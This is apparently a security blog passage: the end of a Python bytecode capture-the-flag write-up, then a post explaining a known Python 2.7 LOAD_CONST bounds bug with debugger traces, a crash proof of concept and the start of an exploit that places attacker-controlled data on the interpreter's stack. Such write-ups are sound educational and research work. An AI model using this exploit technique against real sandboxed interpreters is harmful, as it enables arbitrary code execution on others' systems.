    0x0000000000513e00 <+112>:   call   0x4dc020 <PyMarshal_ReadObjectFromString>

    0x0000000000513e05 <+117>:   mov    rsi,rbx
    0x0000000000513e08 <+120>:   mov    rdi,rax

    ; Creates a function out of it
    0x0000000000513e0b <+123>:   call   0x52c630 <PyFunction_New>
    0x0000000000513e10 <+128>:   xor    edi,edi
    0x0000000000513e12 <+130>:   mov    rbp,rax
    0x0000000000513e15 <+133>:   call   0x478f80 <PyTuple_New>

    ; Calls it
    ; PyObject* PyObject_Call(PyObject *callable_object, PyObject *args, PyObject *kw)
    0x0000000000513e1a <+138>:   xor    edx,edx
    0x0000000000513e1c <+140>:   mov    rdi,rbp
    0x0000000000513e1f <+143>:   mov    rsi,rax
    0x0000000000513e22 <+146>:   call   0x422b40 <PyObject_Call>

Basically, the string you pass to run_me is treated as a marshaled function: it explains why you get segmentation faults when you call the function with random strings. We can just jump over that part of the function because we don't really need it so far: set $eip=0x513e27 and job done!

Second & last marshaled function

By the way I hope you are still reading -- hold tight, we are nearly done! Let's dump the function object with dpy:

-----------------------------------------------------------------------------------------------------------------------[regs]
    RAX: 0x00007FFFF7FA7050  RBX: 0x00007FFFF7F0F758  RBP: 0x00000000007B0270  RSP: 0x00007FFFFFFFE040  o d I t s Z a P c
    RDI: 0x00007FFFF7F0F758  RSI: 0x00007FFFF7FA7050  RDX: 0x0000000000000000  RCX: 0x0000000000000828  RIP: 0x0000000000513E56
    R8 : 0x0000000000880728  R9 : 0x00007FFFF7F8D908  R10: 0x00007FFFF7FA7050  R11: 0x00007FFFF7FA7050  R12: 0x00007FFFF7FD0F48
    R13: 0x00000000007EF0A0  R14: 0x00007FFFF7F3CB00  R15: 0x00007FFFF7F07ED0
    CS: 0033  DS: 0000  ES: 0000  FS: 0000  GS: 0000  SS: 002B
-----------------------------------------------------------------------------------------------------------------------[code]
=> 0x513e56 <run_me+198>:       call   0x422b40 <PyObject_Call>
-----------------------------------------------------------------------------------------------------------------------------
gdb$ dpy $rdi
function -> {'func_code': {'co_code': '\\x7c\\x00\\x00\\x64\\x01\\x00\\x6b\\x03\\x00\\x72\\x19\\x00\\x7c\\x00\\x00\\x64\\x02\\x00\\x55\\x61\\x00\\x00\\x6e\\x6e\\x00\\x7c\\x01\\x00\\x6a\\x02\\x00\\x64\\x03\\x00\\x6a\\x03\\x00\\x64\\x04\\x00\\x77\\x00\\x00\\xa0\\x05\\x00\\xc8\\x06\\x00\\xa0\\x07\\x00\\xb2\\x08\\x00\\xa0\\x09\\x00\\xea\\x0a\\x00\\xa0\\x0b\\x00\\x91\\x08\\x00\\xa0\\x0c\\x00\\x9e\\x0b\\x00\\xa0\\x0d\\x00\\xd4\\x08\\x00\\xa0\\x0e\\x00\\xd5\\x0f\\x00\\xa0\\x10\\x00\\xdd\\x11\\x00\\xa0\\x07\\x00\\xcc\\x08\\x00\\xa0\\x12\\x00\\x78\\x0b\\x00\\xa0\\x13\\x00\\x87\\x0f\\x00\\xa0\\x14\\x00\\x5b\\x15\\x00\\xa0\\x16\\x00\\x97\\x17\\x00\\x67\\x1a\\x00\\x53\\x86\\x01\\x00\\x86\\x01\\x00\\x86\\x01\\x00\\x54\\x64\\x00\\x00\\x1b',
    'co_consts': (None,
        3,
        1,
        '',
        {'co_code': '\\x8f\\x00\\x00\\x5d\\x15\\x00\\x87\\x01\\x00\\x7c\\x00\\x00\\x8f\\x01\\x00\\x64\\x00\\x00\\x4e\\x86\\x01\\x00\\x59\\x54\\x71\\x03\\x00\\x64\\x01\\x00\\x1b',
        'co_consts': (13, None),
        'co_name': '<genexpr>',
        'co_names': ('chr',),
        'co_varnames': ('.0', '_')},
        75,
        98,
        127,
        45,
        89,
        101,
        104,
        67,
        122,
        65,
        120,
        99,
        108,
        95,
        125,
        111,
        97,
        100,
        110),
    'co_name': 'foo',
    'co_names': ('True', 'quarkslab', 'append', 'join'),
    'co_varnames': ()},
    'func_dict': None,
    'func_doc': None,
    'func_module': '__main__',
    'func_name': 'foo'}

Even before studying / disassembling the code, we see some interesting things: chr, quarkslab, append, join, etc. It definitely feels like that function is generating the flag we are looking for.

Seeing append, join and another code object (in co_consts) suggests that a generator is used to populate the variable quarkslab. We also can guess that the bunch of bytes we are seeing may be the flag encoded/encrypted -- anyway we can infer too much information to me just by dumping/looking at the object.

Let's use our magic disassembler.py to see those codes objects:

    19     >>    0 LOAD_GLOBAL              0 (True)
                3 LOAD_CONST               1 (3)
                6 COMPARE_OP               3 (!=)
                9 POP_JUMP_IF_FALSE       25

    20          12 LOAD_GLOBAL              0 (True)
                15 LOAD_CONST               2 (1)
                18 INPLACE_SUBTRACT
                19 STORE_GLOBAL             0 (True)
                22 JUMP_FORWARD           110 (to 135)

    22     >>   25 LOAD_GLOBAL              1 (quarkslab)
                28 LOAD_ATTR                2 (append)
                31 LOAD_CONST               3 ('')
                34 LOAD_ATTR                3 (join)
                37 LOAD_CONST               4 (<code object <genexpr> at 023A84A0, file "obfuscate/gen.py", line 22>)
                40 MAKE_FUNCTION            0
                43 LOAD_CONST2              5 (75)
                46 LOAD_CONST3              6 (98)
                49 LOAD_CONST2              7 (127)
                52 LOAD_CONST5              8 (45)
                55 LOAD_CONST2              9 (89)
                58 LOAD_CONST4             10 (101)
                61 LOAD_CONST2             11 (104)
                64 LOAD_CONST6              8 (45)
                67 LOAD_CONST2             12 (67)
                70 LOAD_CONST7             11 (104)
                73 LOAD_CONST2             13 (122)
                76 LOAD_CONST8              8 (45)
                79 LOAD_CONST2             14 (65)
                82 LOAD_CONST10            15 (120)
                85 LOAD_CONST2             16 (99)
                88 LOAD_CONST9             17 (108)
                91 LOAD_CONST2              7 (127)
                94 LOAD_CONST11             8 (45)
                97 LOAD_CONST2             18 (95)
            100 LOAD_CONST12            11 (104)
            103 LOAD_CONST2             19 (125)
            106 LOAD_CONST16            15 (120)
            109 LOAD_CONST2             20 (111)
            112 LOAD_CONST14            21 (97)
            115 LOAD_CONST2             22 (100)
            118 LOAD_CONST15            23 (110)
            121 BUILD_LIST              26
            124 GET_ITER
            125 CALL_FUNCTION            1
            128 CALL_FUNCTION            1
            131 CALL_FUNCTION            1
            134 POP_TOP
        >>  135 LOAD_CONST               0 (None)
            138 RETURN_VALUE
================================================================================
    22           0 LOAD_FAST                0 (.0)
        >>    3 FOR_ITER                21 (to 27)
                6 LOAD_CONST16             1 (None)
                9 LOAD_GLOBAL              0 (chr)
                12 LOAD_FAST                1 (_)
                15 LOAD_CONST               0 (13)
                18 BINARY_XOR
                19 CALL_FUNCTION            1
                22 YIELD_VALUE
                23 POP_TOP
                24 JUMP_ABSOLUTE            3
        >>   27 LOAD_CONST               1 (None)
                30 RETURN_VALUE

Great, that definitely sounds like what we described earlier.

I need a decompiler dad

Now because we really like to hack things, I decided to patch a Python decompiler to support the opcodes defined in this challenge in order to fully decompile the codes we saw so far.

I won't bother you with how I managed to do it though ; long story short: it is built it on top of fupy.py which is a readable hackable Python 2.7 decompiler written by the awesome Guillaume Delugre -- Cheers to my mate @Myst3rie for telling about this project!

So here is decompiler.py working on the two code objects of the challenge:

PS D:\Codes\ql-chall-python-2014> python .\decompiler_ql_chall.py
PART1 ====================
Robert_Forsyth = 1
True = True + 1

PART2 ====================
if True != 3:
    True = True - 1
else:
    quarkslab.append(''.join(chr(_ ^ 13) for _ in [75, 98, 127, 45, 89, 101, 104, 45, 67, 104, 122, 45, 65, 120, 99, 108, 127, 45, 95, 104, 125, 120, 111, 97, 100, 110]))

Brilliant -- time to get a flag now :-). Here are the things we need to do:

  1. Set True to 2 (so that it's equal to 3 in the part 2)
  2. Declare a list named quarkslab
  3. Jump over the middle part of the function where it will run the bytecode you gave as argument (or give a valid marshaled string that won't crash the interpreter)
  4. Profit!
overclok@wildout:~/chall/ql-py$ /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
Python 2.7.8+ (nvcs/newopcodes:a9bd62e4d5f2+, Sep  1 2014, 11:41:46)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> True = 2
>>> quarkslab = list()
>>> import do_not_run_me as v
>>> v.run_me("c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\x04\x00\x00\x00d\x00\x00\x1B(\x01\x00\x00\x00N(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00rstdinrt\x01\x00\x00\x00a\x01\x00\x00\x00s\x02\x00\x00\x00\x00\x01")
>>> quarkslab
['For The New Lunar Republic']

Conclusion

This was definitely entertaining, so thanks to Serge and Quarkslab for putting this challenge together! I feel like it would have been cooler to force people to write a disassembler or/and a decompiler to study the code of run_me though ; because as I mentioned at the very beginning of the article you don't really need any tool to guess/know roughly where the flag is, and how to get it. I still did write all those little scripts because it was fun and cool that's all!

Anyway, the codes I talked about are available on my github as usual if you want to have a look at them. You can also have look at wildfire.py if you like weird/wild/whatever Python beasts!

That's all for today guys, I hope it wasn't too long and that you did enjoy the read.

By the way, we still think it would be cool to have more people posting on that blog, so if you are interested feel free to contact us!

Deep dive into Python's VM: Story of LOAD_CONST bug

Introduction

A year ago, I've written a Python script to leverage a bug in Python's virtual machine: the idea was to fully control the Python virtual processor and after that to instrument the VM to execute native codes. The python27_abuse_vm_to_execute_x86_code.py script wasn't really self-explanatory, so I believe only a few people actually took some time to understood what happened under the hood. The purpose of this post is to give you an explanation of the bug, how you can control the VM and how you can turn the bug into something that can be more useful. It's also a cool occasion to see how works the Python virtual machine from a low-level perspective: what we love so much right?

But before going further, I just would like to clarify a couple of things:

  • I haven't found this bug, this is quite old and known by the Python developers (trading safety for performance), so don't panic this is not a 0day or a new bug ; can be a cool CTF trick though
  • Obviously, YES I know we can also "escape" the virtual machine with the ctypes module ; but this is a feature not a bug. In addition, ctypes is always "removed" from sandbox implementation in Python

Also, keep in mind I will focus Python 2.7.5 x86 on Windows ; but obviously this is adaptable for other systems and architectures, so this is left as an exercise to the interested readers. All right, let's move on to the first part: this one will focus the essentials about the VM, and Python objects.

The Python virtual processor

Introduction

As you know, Python is a (really cool) scripting language interpreted, and the source of the official interpreter is available here: Python-2.7.6.tgz. The project is written in C, and it is really readable ; so please download the sources, read them, you will learn a lot of things. Now all the Python code you write is being compiled, at some point, into some "bytecodes": let's say it's exactly the same when your C codes are compiled into x86 code. But the cool thing for us, is that the Python architecture is far more simpler than x86.

Here is a partial list of all available opcodes in Python 2.7.5:

In [5]: len(opcode.opmap.keys())
Out[5]: 119
In [4]: opcode.opmap.keys()
Out[4]: [
  'CALL_FUNCTION',
  'DUP_TOP',
  'INPLACE_FLOOR_DIVIDE',
  'MAP_ADD',
  'BINARY_XOR',
  'END_FINALLY',
  'RETURN_VALUE',
  'POP_BLOCK',
  'SETUP_LOOP',
  'BUILD_SET',
  'POP_TOP',
  'EXTENDED_ARG',
  'SETUP_FINALLY',
  'INPLACE_TRUE_DIVIDE',
  'CALL_FUNCTION_KW',
  'INPLACE_AND',
  'SETUP_EXCEPT',
  'STORE_NAME',
  'IMPORT_NAME',
  'LOAD_GLOBAL',
  'LOAD_NAME',
  ...
]

The virtual machine

The Python VM is fully implemented in the function PyEval_EvalFrameEx that you can find in the ceval.c file. The machine is built with a simple loop handling opcodes one-by-one with a bunch of switch-cases:

PyObject *
PyEval_EvalFrameEx(PyFrameObject *f, int throwflag)
{
  //...
  fast_next_opcode:
  //...
  /* Extract opcode and argument */
  opcode = NEXTOP();
  oparg = 0;
  if (HAS_ARG(opcode))
    oparg = NEXTARG();
  //...
  switch (opcode)
  {
    case NOP:
      goto fast_next_opcode;

    case LOAD_FAST:
      x = GETLOCAL(oparg);
      if (x != NULL) {
        Py_INCREF(x);
        PUSH(x);
        goto fast_next_opcode;
      }
      format_exc_check_arg(PyExc_UnboundLocalError,
        UNBOUNDLOCAL_ERROR_MSG,
        PyTuple_GetItem(co->co_varnames, oparg));
      break;

    case LOAD_CONST:
      x = GETITEM(consts, oparg);
      Py_INCREF(x);
      PUSH(x);
      goto fast_next_opcode;

    case STORE_FAST:
      v = POP();
      SETLOCAL(oparg, v);
      goto fast_next_opcode;

    //...
  }

The machine also uses a virtual stack to pass/return object to the different opcodes. So it really looks like an architecture we are used to dealing with, nothing exotic.

Everything is an object

The first rule of the VM is that it handles only Python objects. A Python object is basically made of two parts:

  • The first one is a header, this header is mandatory for all the objects. Defined like that:
#define PyObject_HEAD                   \
  _PyObject_HEAD_EXTRA                \
  Py_ssize_t ob_refcnt;               \
  struct _typeobject *ob_type;

#define PyObject_VAR_HEAD               \
  PyObject_HEAD                       \
  Py_ssize_t ob_size; /* Number of items in variable part */
  • The second one is the variable part that describes the specifics of your object. Here is for example PyStringObject:
typedef struct {
  PyObject_VAR_HEAD
  long ob_shash;
  int ob_sstate;
  char ob_sval[1];

  /* Invariants:
    *     ob_sval contains space for 'ob_size+1' elements.
    *     ob_sval[ob_size] == 0.
    *     ob_shash is the hash of the string or -1 if not computed yet.
    *     ob_sstate != 0 iff the string object is in stringobject.c's
    *       'interned' dictionary; in this case the two references
    *       from 'interned' to this object are *not counted* in ob_refcnt.
    */
} PyStringObject;

Now, some of you may ask themselves "How does Python know the type of an object when it receives a pointer ?". In fact, this is exactly the role of the field ob_type. Python exports a _typeobject static variable that describes the type of the object. Here is, for instance the PyString_Type:

PyTypeObject PyString_Type = {
  PyVarObject_HEAD_INIT(&PyType_Type, 0)
  "str",
  PyStringObject_SIZE,
  sizeof(char),
  string_dealloc,                             /* tp_dealloc */
  (printfunc)string_print,                    /* tp_print */
  0,                                          /* tp_getattr */
  // ...
};

Basically, every string objects will have their ob_type fields pointing to that PyString_Type variable. With this cute little trick, Python is able to do type checking like that:

#define Py_TYPE(ob)             (((PyObject*)(ob))->ob_type)
#define PyType_HasFeature(t,f)  (((t)->tp_flags & (f)) != 0)
#define PyType_FastSubclass(t,f)  PyType_HasFeature(t,f)

#define PyString_Check(op) \
  PyType_FastSubclass(Py_TYPE(op), Py_TPFLAGS_STRING_SUBCLASS)

#define PyString_CheckExact(op) (Py_TYPE(op) == &PyString_Type)

With the previous tricks, and the PyObject type defined as follow, Python is able to handle in a generic-fashion the different objects:

typedef struct _object {
  PyObject_HEAD
} PyObject;

So when you are in your debugger and you want to know what type of object it is, you can use that field to identify easily the type of the object you are dealing with:

0:000> dps 026233b0 l2
026233b0  00000001
026233b4  1e226798 python27!PyString_Type

Once you have done that, you can dump the variable part describing your object to extract the information you want. By the way, all the native objects are implemented in the Objects/ directory.

Debugging session: stepping the VM. The hard way.

It's time for us to go a little bit deeper, at the assembly level, where we belong ; so let's define a dummy function like this one:

def a(b, c):
  return b + c

Now using the Python's dis module, we can disassemble the function object a:

In [20]: dis.dis(a)
2   0 LOAD_FAST                0 (b)
    3 LOAD_FAST                1 (c)
    6 BINARY_ADD
    7 RETURN_VALUE
In [21]: a.func_code.co_code
In [22]: print ''.join('\\x%.2x' % ord(i) for i in a.__code__.co_code)
\x7c\x00\x00\x7c\x01\x00\x17\x53

In [23]: opcode.opname[0x7c]
Out[23]: 'LOAD_FAST'
In [24]: opcode.opname[0x17]
Out[24]: 'BINARY_ADD'
In [25]: opcode.opname[0x53]
Out[25]: 'RETURN_VALUE'

Keep in mind, as we said earlier, that everything is an object ; so a function is an object, and bytecode is an object as well:

typedef struct {
  PyObject_HEAD
  PyObject *func_code;  /* A code object */
  // ...
} PyFunctionObject;
/* Bytecode object */
typedef struct {
    PyObject_HEAD
    //...
    PyObject *co_code;    /* instruction opcodes */
    //...
} PyCodeObject;

Time to attach my debugger to the interpreter to see what's going on in that weird-machine, and to place a conditional breakpoint on PyEval_EvalFrameEx. Once you did that, you can call the dummy function:

0:000> bp python27!PyEval_EvalFrameEx+0x2b2 ".if(poi(ecx+4) == 0x53170001){}.else{g}"
breakpoint 0 redefined

0:000> g
eax=025ea914 ebx=00000000 ecx=025ea914 edx=026bef98 esi=1e222c0c edi=02002e38
eip=1e0ec562 esp=0027fcd8 ebp=026bf0d8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601          movzx   eax,byte ptr [ecx]         ds:002b:025ea914=7c

0:000> db ecx l8
025ea914  7c 00 00 7c 01 00 17 53                          |..|...S

OK perfect, we are in the middle of the VM, and our function is being evaluated. The register ECX points to the bytecode being evaluated, and the first opcode is LOAD_FAST.

Basically, this opcode takes an object in the fastlocals array, and push it on the virtual stack. In our case, as we saw in both the disassembly and the bytecode dump, we are going to load the index 0 (the argument b), then the index 1 (argument c).

Here's what it looks like in the debugger ; first step is to load the LOAD_FAST opcode:

0:000>
eax=025ea914 ebx=00000000 ecx=025ea914 edx=026bef98 esi=1e222c0c edi=02002e38
eip=1e0ec562 esp=0027fcd8 ebp=026bf0d8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601          movzx   eax,byte ptr [ecx]         ds:002b:025ea914=7c

In ECX we have a pointer onto the opcodes of the function being evaluated, our dummy function. 0x7c is the value of the LOAD_FAST opcode as we can see:

#define LOAD_FAST 124 /* Local variable number */

Then, the function needs to check if the opcode has argument or not, and that's done by comparing the opcode with a constant value called HAVE_ARGUMENT:

0:000>
eax=0000007c ebx=00000000 ecx=025ea915 edx=026bef98 esi=1e222c0c edi=00000000
eip=1e0ec568 esp=0027fcd8 ebp=026bf0d8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
python27!PyEval_EvalFrameEx+0x2b8:
1e0ec568 83f85a          cmp     eax,5Ah

Again, we can verify the value to be sure we understand what we are doing:

In [11]: '%x' % opcode.HAVE_ARGUMENT
Out[11]: '5a'

Definition of HAS_ARG in C:

#define HAS_ARG(op) ((op) >= HAVE_ARGUMENT)

If the opcode has an argument, the function needs to retrieve it (it's one byte):

0:000>
eax=0000007c ebx=00000000 ecx=025ea915 edx=026bef98 esi=1e222c0c edi=00000000
eip=1e0ec571 esp=0027fcd8 ebp=026bf0d8 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
python27!PyEval_EvalFrameEx+0x2c1:
1e0ec571 0fb67901        movzx   edi,byte ptr [ecx+1]       ds:002b:025ea916=00

As expected for the first LOAD_FAST the argument is 0x00, perfect. After that the function dispatches the execution flow to the LOAD_FAST case defined as follow:

#define GETLOCAL(i)     (fastlocals[i])
#define Py_INCREF(op) (                         \
    _Py_INC_REFTOTAL  _Py_REF_DEBUG_COMMA       \
    ((PyObject*)(op))->ob_refcnt++)
#define PUSH(v)                BASIC_PUSH(v)
#define BASIC_PUSH(v)     (*stack_pointer++ = (v))

case LOAD_FAST:
  x = GETLOCAL(oparg);
  if (x != NULL) {
    Py_INCREF(x);
    PUSH(x);
    goto fast_next_opcode;
  }
  //...
  break;

Let's see what it looks like in assembly:

0:000>
eax=0000007c ebx=00000000 ecx=0000007b edx=00000059 esi=1e222c0c edi=00000000
eip=1e0ec5cf esp=0027fcd8 ebp=026bf0d8 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
python27!PyEval_EvalFrameEx+0x31f:
1e0ec5cf 8b54246c        mov     edx,dword ptr [esp+6Ch] ss:002b:0027fd44=98ef6b02

After getting the fastlocals, we can retrieve an entry:

0:000>
eax=0000007c ebx=00000000 ecx=0000007b edx=026bef98 esi=1e222c0c edi=00000000
eip=1e0ec5d3 esp=0027fcd8 ebp=026bf0d8 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
python27!PyEval_EvalFrameEx+0x323:
1e0ec5d3 8bb4ba38010000  mov     esi,dword ptr [edx+edi*4+138h] ds:002b:026bf0d0=a0aa5e02

Also keep in mind we called our dummy function with two strings, so let's actually check it is a string object:

0:000> dps 025eaaa0 l2
025eaaa0  00000004
025eaaa4  1e226798 python27!PyString_Type

Perfect, now according to the definition of PyStringObject:

typedef struct {
    PyObject_VAR_HEAD
    long ob_shash;
    int ob_sstate;
    char ob_sval[1];
} PyStringObject;

We should find the content of the string directly in the object:

0:000> db 025eaaa0 l1f
025eaaa0  04 00 00 00 98 67 22 1e-05 00 00 00 dd 16 30 43  .....g".......0C
025eaab0  01 00 00 00 48 65 6c 6c-6f 00 00 00 ff ff ff     ....Hello......

Awesome, we have the size of the string at the offset 0x8, and the actual string is at 0x14.

Let's move on to the second opcode now, this time with less details though:

0:000> 
eax=0000007c ebx=00000000 ecx=025ea917 edx=026bef98 esi=025eaaa0 edi=00000000
eip=1e0ec562 esp=0027fcd8 ebp=026bf0dc iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601          movzx   eax,byte ptr [ecx]         ds:002b:025ea917=7c

This time, we are loading the second argument, so the index 1 of fastlocals. We can type-check the object and dump the string stored in it:

0:000> 
eax=0000007c ebx=00000000 ecx=0000007b edx=026bef98 esi=025eaaa0 edi=00000001
eip=1e0ec5d3 esp=0027fcd8 ebp=026bf0dc iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
python27!PyEval_EvalFrameEx+0x323:
1e0ec5d3 8bb4ba38010000  mov     esi,dword ptr [edx+edi*4+138h] ds:002b:026bf0d4=c0af5e02
0:000> db poi(026bf0d4) l1f
025eafc0  04 00 00 00 98 67 22 1e-05 00 00 00 39 4a 25 29  .....g".....9J%)
025eafd0  01 00 00 00 57 6f 72 6c-64 00 5e 02 79 00 00     ....World.^.y..

Comes now the BINARY_ADD opcode:

0:000> 
eax=0000007c ebx=00000000 ecx=025ea91a edx=026bef98 esi=025eafc0 edi=00000001
eip=1e0ec562 esp=0027fcd8 ebp=026bf0e0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601          movzx   eax,byte ptr [ecx]         ds:002b:025ea91a=17

Here it's supposed to retrieve the two objects on the top-of-stack, and add them. The C code looks like this:

#define SET_TOP(v)        (stack_pointer[-1] = (v))

case BINARY_ADD:
  w = POP();
  v = TOP();
  if (PyInt_CheckExact(v) && PyInt_CheckExact(w)) {
    // Not our case
  }
  else if (PyString_CheckExact(v) &&
            PyString_CheckExact(w)) {
      x = string_concatenate(v, w, f, next_instr);
      /* string_concatenate consumed the ref to v */
      goto skip_decref_vx;
  }
  else {
    // Not our case
  }
  Py_DECREF(v);
skip_decref_vx:
  Py_DECREF(w);
  SET_TOP(x);
  if (x != NULL) continue;
  break;

And here is the assembly version where it retrieves the two objects from the top-of-stack:

0:000> 
eax=00000017 ebx=00000000 ecx=00000016 edx=0000000f esi=025eafc0 edi=00000000
eip=1e0eccf5 esp=0027fcd8 ebp=026bf0e0 iopl=0         nv up ei ng nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200287
python27!PyEval_EvalFrameEx+0xa45:
1e0eccf5 8b75f8          mov     esi,dword ptr [ebp-8] ss:002b:026bf0d8=a0aa5e02
...

0:000> 
eax=1e226798 ebx=00000000 ecx=00000016 edx=0000000f esi=025eaaa0 edi=00000000
eip=1e0eccfb esp=0027fcd8 ebp=026bf0e0 iopl=0         nv up ei ng nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200287
python27!PyEval_EvalFrameEx+0xa4b:
1e0eccfb 8b7dfc          mov     edi,dword ptr [ebp-4] ss:002b:026bf0dc=c0af5e02

0:000> 
eax=1e226798 ebx=00000000 ecx=00000016 edx=0000000f esi=025eaaa0 edi=025eafc0
eip=1e0eccfe esp=0027fcd8 ebp=026bf0e0 iopl=0         nv up ei ng nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200287
python27!PyEval_EvalFrameEx+0xa4e:
1e0eccfe 83ed04          sub     ebp,4

A bit further we have our string concatenation:

0:000> 
eax=025eafc0 ebx=00000000 ecx=0027fcd0 edx=026bef98 esi=025eaaa0 edi=025eafc0
eip=1e0eb733 esp=0027fcb8 ebp=00000005 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
python27!PyEval_SliceIndex+0x813:
1e0eb733 e83881fcff      call    python27!PyString_Concat (1e0b3870)

0:000> dd esp l3
0027fcb8  0027fcd0 025eafc0 025eaaa0

0:000> p
eax=025eaaa0 ebx=00000000 ecx=00000064 edx=000004fb esi=025eaaa0 edi=025eafc0
eip=1e0eb738 esp=0027fcb8 ebp=00000005 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
python27!PyEval_SliceIndex+0x818:
1e0eb738 8b442418        mov     eax,dword ptr [esp+18h] ss:002b:0027fcd0=c0aa5e02

0:000> db poi(0027fcd0) l1f
025eaac0  01 00 00 00 98 67 22 1e-0a 00 00 00 ff ff ff ff  .....g".........
025eaad0  00 00 00 00 48 65 6c 6c-6f 57 6f 72 6c 64 00     ....HelloWorld.

And the last part of the case is to push the resulting string onto the virtual stack (SET_TOP operation):

0:000> 
eax=025eaac0 ebx=025eaac0 ecx=00000005 edx=000004fb esi=025eaaa0 edi=025eafc0
eip=1e0ecb82 esp=0027fcd8 ebp=026bf0dc iopl=0         nv up ei pl nz ac po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200213
python27!PyEval_EvalFrameEx+0x8d2:
1e0ecb82 895dfc          mov     dword ptr [ebp-4],ebx ss:002b:026bf0d8=a0aa5e02

Last part of our deep dive, the RETURN_VALUE opcode:

0:000> 
eax=025eaac0 ebx=025eafc0 ecx=025ea91b edx=026bef98 esi=025eaac0 edi=025eafc0
eip=1e0ec562 esp=0027fcd8 ebp=026bf0dc iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601          movzx   eax,byte ptr [ecx]         ds:002b:025ea91b=53

All right, at least now you have a more precise idea about how that Python virtual machine works, and more importantly how you can directly debug it without symbols. Of course, you can download the debug symbols on Linux and use that information in gdb ; it should make your life easier (....but I hate gdb man...).

Note that I would love very much to have a debugger at the Python bytecode level, it would be much easier than instrumenting the interpreter. If you know one ping me! If you build one ping me too :-).

The bug

Here is the bug, spot it and give it some love:

#ifndef Py_DEBUG
#define GETITEM(v, i) PyTuple_GET_ITEM((PyTupleObject *)(v), (i))
#else
//...
/* Macro, trading safety for speed <-- LOL, :) */ 
#define PyTuple_GET_ITEM(op, i) (((PyTupleObject *)(op))->ob_item[i])

case LOAD_CONST:
  x = GETITEM(consts, oparg);
  Py_INCREF(x);
  PUSH(x);
  goto fast_next_opcode;

This may be a bit obscure for you, but keep in mind we control the index oparg and the content of consts. That means we can just push untrusted data on the virtual stack of the VM: brilliant. Getting a crash out of this bug is fairly easy, try to run these lines (on a Python 2.7 distribution):

import opcode
import types

def a():
  pass

a.func_code = types.CodeType(
  0, 0, 0, 0,
  chr(opcode.opmap['EXTENDED_ARG']) + '\xef\xbe' +
  chr(opcode.opmap['LOAD_CONST'])   + '\xad\xde',
  (), (), (), '', '', 0, ''
)
a()

..and as expected you get a fault (oparg is edi):

(2058.2108): Access violation - code c0000005 (!!! second chance !!!)
[...]
eax=01cb1030 ebx=00000000 ecx=00000063 edx=00000046 esi=1e222c0c edi=beefdead
eip=1e0ec5f7 esp=0027e7f8 ebp=0273a9f0 iopl=0         nv up ei ng nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010287
python27!PyEval_EvalFrameEx+0x347:
1e0ec5f7 8b74b80c        mov     esi,dword ptr [eax+edi*4+0Ch] ds:002b:fd8a8af0=????????

By the way, some readers might have caught the same type of bug in LOAD_FAST with the fastlocals array ; those readers are definitely right :).

Walking through the PoC

OK, so if you look only at the faulting instruction you could say that the bug is minor and we won't be able to turn it into something "useful". But the essential piece when you want to exploit a software is to actually completely understand how it works. Then you are more capable of turning bugs that seems useless into interesting primitives.

As we said several times, from Python code you can't really push any value you want onto the Python virtual stack, obviously. The machine is only dealing with Python objects. However, with this bug we can corrupt the virtual stack by pushing arbitrary data that we control. If you do that well, you can end up causing the Python VM to call whatever address you want. That's exactly what I did back when I wrote python27_abuse_vm_to_execute_x86_code.py.

In Python we are really lucky because we can control a lot of things in memory and we have natively a way to "leak" (I shouldn't call that a leak though because it's a feature) the address of a Python object with the function id. So basically we can do stuff, we can do it reliably and we can manage to not break the interpreter, like bosses.

Pushing attacker-controlled data on the virtual stack

We control oparg and the content of the tuple consts. We can also find out the address of that tuple. So we can have a Python string object that stores an arbitrary value, let's say 0xdeadbeef and it will be pushed on the virtual stack.

Let's do that in Python now:

import opcode
import types
import struct

def pshort(s):
    return struct.pack('<H', s)

def a():
  pass

consts = ()
s = '\xef\xbe\xad\xde'
address_s = id(s) + 20 # 20 is the offset of the array of byte we control in the string
address_consts = id(consts)
# python27!PyEval_EvalFrameEx+0x347:
# 1e0ec5f7 8b74b80c        mov     esi,dword ptr [eax+edi*4+0Ch] ds:002b:fd8a8af0=????????
offset = ((address_s - address_consts - 0xC) / 4) & 0xffffffff
